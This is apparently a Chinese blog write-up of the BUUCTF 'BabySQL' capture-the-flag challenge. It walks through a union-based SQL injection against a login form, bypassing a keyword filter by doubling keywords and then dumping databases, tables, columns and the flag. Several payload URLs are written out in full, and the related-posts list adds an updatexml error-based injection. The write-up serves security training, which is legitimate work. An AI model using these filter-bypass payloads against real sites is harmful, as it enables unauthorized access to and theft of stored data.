2. 程式人生 > 其它 >buuctf:[極客大挑戰 2019]BabySQL

buuctf:[極客大挑戰 2019]BabySQL

阿新 發佈:2021-10-31

既然是sql注入,先檢視有沒有過濾字元

or union select應該都被過濾了

嘗試繞過方法,發現雙寫可以繞過,先用ununionion seselectlec去判斷有幾列

?username=123&password=1' ununionion seselectlect 1,2,3%23

發現有三列,回顯欄位為2和3

檢視當前資料庫

username=admin&password=1' ununionion seselectlect 1,2,database() %23

爆庫

group_concat(schema_name) from (information_schema.schemata)

?username=admin&password=1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom(infoorrmation_schema.schemata) %23

爆ctf庫的表

group_concat(table_name) from (information_schema.tables) where table_schema=

?username=admin&password=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf" %23

爆欄位

group_concat(column_name) from (information_schema.columns) where table_name=

username=admin&password=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag" %23

爆資料

group_concat(flag) from ()

?username=admin&password=1' ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23

得到flag

相關推薦

buuctf[挑戰 2019]BabySQL

既然是sql注入,先檢視有沒有過濾字元 or union select應該都被過濾了 嘗試繞過方法,發現雙寫可以繞過,先用ununionion seselectlec去判斷有幾列

[挑戰 2019]BabySQL

解題思路 打開發現是登陸框,先嚐試下二次注入 admin\'# 123456 ,登陸成功,獲取密碼,但是不知道下一步如何利用。

Buuctf-web-[挑戰 2019]HardSQL

被堵 異或運算子為^ 或者 xor兩個同為真的條件做異或,結果為假,兩個同為假的條件做異或,結果為假,一個條件為真,一個條件為假,結果為真,null與任何條件(真、假、null)做異或,結果都為null

[挑戰 2019]BabySQL 1

1.發現 1.1隨便輸入,檢視結果。 1.2使用萬能密碼,登入失敗。 /check.php?username=admin\' or \'1\'=\'1&password=1

[BUUCTF][Web][挑戰 2019]Secret File 1

開啟靶機對應的url 右鍵檢視網頁原始碼,檢視到一個訪問路徑 /Archive_room.php 構造url訪問一下

[BUUCTF][Web][挑戰 2019]LoveSQL 1

開啟靶機url,頁面顯示有兩個輸入框,框中輸入123\',發現兩個框都有sql注入問題

[BUUCTF][WEB][挑戰 2019]Http 1

開啟靶機提供的url 右鍵檢視網頁原始碼 發現一個連結 (Secret.php),訪問看看 返回

BUUCTF-[挑戰 2019]PHP 1

開啟題目,我們就看到這個貓,先是用滑鼠晃了晃,還跟著我的游標搖腦袋。我是來做題的。前端工程師肯定也對這個下功夫了。

BUUCTF-[挑戰 2019]HardSQL 1詳解

來到sql注入騷姿勢,我們一點一點開始學 我們來到這道題,然後嘗試注入,結果發現

BUUCTF-[挑戰 2019]HardSQL 1

使用updatexml報錯法注入 http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin\'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21

[挑戰 2019]PHP

題目上說有備份的好習慣,掃描目錄得到www.zip 幾個重要php檔案內容 index.php 1 <?php

[挑戰 2019]BuyFlag

0x01 進入頁面如下 結合題目buyflag的提示,我們點選payflag看看 檢視一下原始碼 發現端倪

[挑戰 2019]LoveSQL

0x00 開啟網頁 首先試試萬能密碼 賬戶隨意 密碼1\' or 1=1# 得到一段加密的密文,應該是MD5,結果找了很多網站也沒能解開

[挑戰 2019]Secret File 思路

絕密檔案,開啟首頁是這個 之後我們開啟原始碼發現了一個頁面,我們跟進去

[挑戰 2019]HardSQL updatexml

報錯注入連結 https://www.cnblogs.com/richardlee97/p/10617115.html報錯原因 其原因主要是因為虛擬表的主鍵重複。按照MySQL的官方說法,group by要進行兩次運算,第一次是拿group by後面的欄位值到虛擬表中去對

[挑戰 2019]PHP 1

進入頁面,檢查原始碼之類的都沒資訊,提到了備份,用御劍掃描出www.zip,直接加在url後

[挑戰 2019]EasySQL

[挑戰 2019]EasySQL 嘗試使用萬能密碼登入admin’or 1=1 – ss 成功。

[挑戰 2019]HardSQL

技術標籤web 嘗試了一下發現空格在內的好多東西都被過濾掉了學到了報錯注入(空格用括號代替)

buu-[挑戰 2019]PHP

開啟題目 根據提示 用備份檔案的字典來爆破 得知備份檔案為www.zip 將備份檔案下載下來

[挑戰 2019]BuyFlag 1

本篇文章通過CTF試題-主要內容就是php-strcmp函式繞過,php弱型別比較 [挑戰 2019]BuyFlag 1